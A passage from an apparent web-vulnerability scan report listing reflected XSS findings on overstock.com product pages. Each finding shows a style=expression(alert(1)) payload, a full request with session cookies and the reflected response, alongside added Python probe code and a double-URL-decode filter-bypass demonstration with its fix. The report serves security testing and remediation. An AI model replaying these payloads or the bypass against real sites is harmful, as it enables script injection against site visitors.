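    """Request target with the canary-wrapped payload used as a parameter NAME."""
    payload = f'{prefix}"style="{INJECTED_STYLE}"{suffix}'
    return f"{base_path}?{quote(payload, safe=SAFE_CHARS)}=1"


class _TagCollector(HTMLParser):
    """Collects every start tag whose attributes mention the canary prefix."""

    def __init__(self, prefix):
        super().__init__()
        self.prefix = prefix
        self.hits = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # attribute names are lower-cased by html.parser
        if any(self.prefix in (v or "") for v in attrs.values()):
            self.hits.append((tag, attrs))


def find_attribute_break(body, prefix):
    """Return (tag, attrs) for the element where the payload escaped the quoted
    attribute, or None if every reflection stayed inside a single value.

    A break is recognised when the canary prefix is the COMPLETE value of one
    attribute and the injected style attribute appears on the same element.
    If the quote was HTML-encoded on output, html.parser unescapes &quot; back
    to '"' inside one attribute value and no 'style' attribute exists, so the
    function returns None.
    """
    collector = _TagCollector(prefix)
    collector.feed(body)
    for tag, attrs in collector.hits:
        if prefix in attrs.values() and attrs.get("style") == INJECTED_STYLE:
            return tag, attrs
    return None


# Constructed response fragments. The first reproduces the reflection shown in
# the report; the second is what correct attribute encoding would produce.
VULNERABLE_BODY = (
    '<form><input type="hidden" name="50a5c"style="x:expression(alert(1))"'
    'e0c993399bf" value="1"/></form>'
)
ENCODED_BODY = (
    '<form><input type="hidden" name="50a5c&quot;style=&quot;'
    'x:expression(alert(1))&quot;e0c993399bf" value="1"/></form>'
)

if __name__ == "__main__":
    print(build_probe_path("/product.html", "134ae", "050d7f052a0"))
    print("vulnerable:", find_attribute_break(VULNERABLE_BODY, "50a5c"))
    print("encoded:   ", find_attribute_break(ENCODED_BODY, "50a5c"))
```

The parser-based check is deliberately stricter than a substring search: it only reports a break when the browser-side tokenisation actually yields a separate style attribute, which is what distinguishes a real attribute-context escape from a reflection that merely contains the payload text.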

2.104. http://www.overstock.com/Eziba/Cozumel-Chaise/4893252/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Eziba/Cozumel-Chaise/4893252/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50a5c"style="x:expression(alert(1))"e0c993399bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. In this instance the double quote was sent as %2522 and the = sign as %253d; the first decode (by the web server) turns these into %22 and %3d, which pass the filter, and a second decode performed by the application restores the literal characters before they are written into the attribute.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the parameter name should be HTML-attribute-encoded at the point where it is written into the input tag; a character blacklist is not a substitute for output encoding, and encoding on output closes the attribute break regardless of how many decodes precede it.
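The decode-filter-decode sequence described above, with the remediation next to it, as an added example that is not code from the report or from the site's own application. The request handling is a hypothetical reconstruction of the behaviour the finding describes (web server decodes once, application filters, then decodes again before writing the parameter name into a hidden input); all function names are invented, and the query strings are taken from the Request line of this finding plus a constructed single-encoded equivalent.

```python
"""Double-decode filter bypass and its fix (added example, hypothetical code)."""
from html import escape
from urllib.parse import unquote

# Characters the hypothetical blacklist removes before rendering.
BLOCKED_CHARS = '<>"\''

# Query strings: a constructed single-encoded form of the payload, and the
# double-encoded form exactly as sent in finding 2.104.
SINGLE_ENCODED = "50a5c%22style%3d%22x%3aexpression(alert(1))%22e0c993399bf=1"
DOUBLE_ENCODED = ("50a5c%2522style%253d%2522x%253aexpression%2528alert%25281"
                  "%2529%2529%2522e0c993399bf=1")


def _strip_blocked(s):
    """Blacklist filter: drops the characters in BLOCKED_CHARS."""
    return "".join(ch for ch in s if ch not in BLOCKED_CHARS)


def render_vulnerable(query):
    """Broken pipeline: decode (web server), blacklist, decode AGAIN (application),
    then write the parameter name into the attribute without HTML encoding."""
    inputs = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        name = unquote(name)            # 1st decode, done by the web server
        name = _strip_blocked(name)     # filter sees %22, not a quote
        name = unquote(name)            # 2nd decode turns %22 into " after the check
        inputs.append(f'<input type="hidden" name="{name}" value="{value}"/>')
    return "\n".join(inputs)


def render_fixed(query):
    """Decode exactly once, then HTML-attribute-encode at the output point.
    No blacklist is needed: an encoded quote cannot terminate the attribute."""
    inputs = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        name = escape(unquote(name), quote=True)
        value = escape(unquote(value), quote=True)
        inputs.append(f'<input type="hidden" name="{name}" value="{value}"/>')
    return "\n".join(inputs)


def attribute_broken(rendered):
    """True if the injected style attribute stands on its own in the markup."""
    return '"style="x:expression(alert(1))"' in rendered


if __name__ == "__main__":
    for label, query in (("single", SINGLE_ENCODED), ("double", DOUBLE_ENCODED)):
        print(label, "vulnerable:", attribute_broken(render_vulnerable(query)))
        print(label, "fixed:     ", attribute_broken(render_fixed(query)))
        print(render_vulnerable(query))
```

Run with the double-encoded query, render_vulnerable() emits exactly the input line shown in the response below, while the single-encoded query is neutralised by the blacklist; render_fixed() leaves the attribute intact for both because the quote is either still percent-encoded (one decode only) or turned into &quot; on output.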

Request

GET /Eziba/Cozumel-Chaise/4893252/product.html?50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:18 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404218406:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4893252|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:18 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:18 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 103622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Co
...[SNIP]...
<input type="hidden" name="50a5c"style="x:expression(alert(1))"e0c993399bf" value="1"/>
...[SNIP]...

2.105. http://www.overstock.com/Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce38"style%3d"x%3aexpression(alert(1))"74566734d36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ce38"style="x:expression(alert(1))"74566734d36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html?3ce38"style%3d"x%3aexpression(alert(1))"74566734d36=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:10 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4413829|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408890347:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108056

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ar
...[SNIP]...
<input type="hidden" name="3ce38"style="x:expression(alert(1))"74566734d36" value="1"/>
...[SNIP]...

2.106. http://www.overstock.com/Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f94e1"style="x:expression(alert(1))"8825e2ad130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html?f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:52 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408872824:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4415728|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:52 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:52 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ar
...[SNIP]...
<input type="hidden" name="f94e1"style="x:expression(alert(1))"8825e2ad130" value="1"/>
...[SNIP]...

2.107. http://www.overstock.com/Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da40d"style%3d"x%3aexpression(alert(1))"40d931848fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da40d"style="x:expression(alert(1))"40d931848fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html?da40d"style%3d"x%3aexpression(alert(1))"40d931848fb=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:56 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:56 GMT; Path=/
Set-Cookie: mxcproclicks=5098578|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:56 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408876091:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110982

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="da40d"style="x:expression(alert(1))"40d931848fb" value="1"/>
...[SNIP]...

2.108. http://www.overstock.com/Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de180"style="x:expression(alert(1))"452ca6d83aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html?de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:07 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:07 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=2684796|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:07 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408887415:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:07 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ex
...[SNIP]...
<input type="hidden" name="de180"style="x:expression(alert(1))"452ca6d83aa" value="1"/>
...[SNIP]...

2.109. http://www.overstock.com/Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 984b8"style="x:expression(alert(1))"5b593c816ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html?984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:42 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:42 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=1562292|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408862200:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109156

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Hi
...[SNIP]...
<input type="hidden" name="984b8"style="x:expression(alert(1))"5b593c816ca" value="1"/>
...[SNIP]...

2.110. http://www.overstock.com/Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5f8"style="x:expression(alert(1))"73f60b7f756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

